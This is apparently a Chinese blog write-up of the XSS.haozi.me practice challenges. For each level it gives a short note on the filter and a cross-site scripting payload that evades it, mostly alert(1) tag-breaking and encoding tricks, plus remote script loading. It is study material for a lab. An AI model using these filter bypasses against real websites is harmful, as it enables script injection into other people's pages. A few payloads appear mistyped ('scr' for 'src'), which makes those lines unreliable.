MENU

XSS.haozi.me的XSS练习

2020 年 08 月 18 日 • 阅读: 307 • 阅读设置

0x00

<script>alert(1)</script>

0x01

html中闭合</textarea>即可执行

<script>alert(1)</script>

0x02

html中闭合input标签

"><script>alert(1)</script>

0x03

服务器过滤括号(),不使用括号即可

<script>alert`1`</script>

0x04

服务器过滤括号和反引号() \`
<svg>可以执行unicode

<svg><script>alert&#40;1&#41;</script></svg>

0x05

服务器将-->转义

--!><script>alert(1)</script>

0x06

服务器正则匹配on开头=结尾的全部转义

="alert(1)"

2. ```
type=image src onerror
=alert(1)

类似即可

0x07

服务器正则匹配<>,以<开头,以>结尾的全部替换为空
所以只以<开头,不写 >,即可

<svg onmouseover="alert(1)" 

0x08

</style>转义为坏蛋两个字

</style ><script>alert(1)</script>

0x09

必须包含提供的网址,输入网址后,对其中的</script>闭合构造新的语句

http://www.sementfault.com"></script><script>alert(1)</script>

0x0A

&"'<>/进行了转义,并且必须包含网址,输入网址后,添加@及js地址,实现绕过

http://www.segmentfault.com@xss.haozi.me/j.js

0x0B

将输入的内容转义成大写,html、标签、域名不区分大小写,js区分大小写,让服务器返回J.JS即可

<script src="http://127.0.0.1/xss_1/j.js"></script>

0x0C

过滤script,进行畸形构造scrscriptipt

<scrscriptipt scr="http://127.0.0.1/j.js"></scrscriptipt>

0x0D

过滤了</'"并对alert()进行了注释,通过回车破坏注释结构,结束时使用-->注释掉')

alert(1)
-->

0x0E

<后面加一个字符进行过滤,即<s转义欸<_s
使用ſ字符来替代s

<ſcript scr="http://127.0.0.1/xss_1/j.js"

0x0F

&'"<>\进行过滤,但是浏览器会先解析html,再解析js

');alert('1

0x10

无过滤,直接在<script>中执行即可

alert(1)

0x11

"转义为\",虽然转义,但是不影响闭合

");alert(1)//

0x12

"过滤为\",不影响注入,重新构造script

</script><script>alert(1)</script>
最后编辑于: 2020 年 12 月 22 日
返回文章列表 文章二维码 打赏
本页链接的二维码
打赏二维码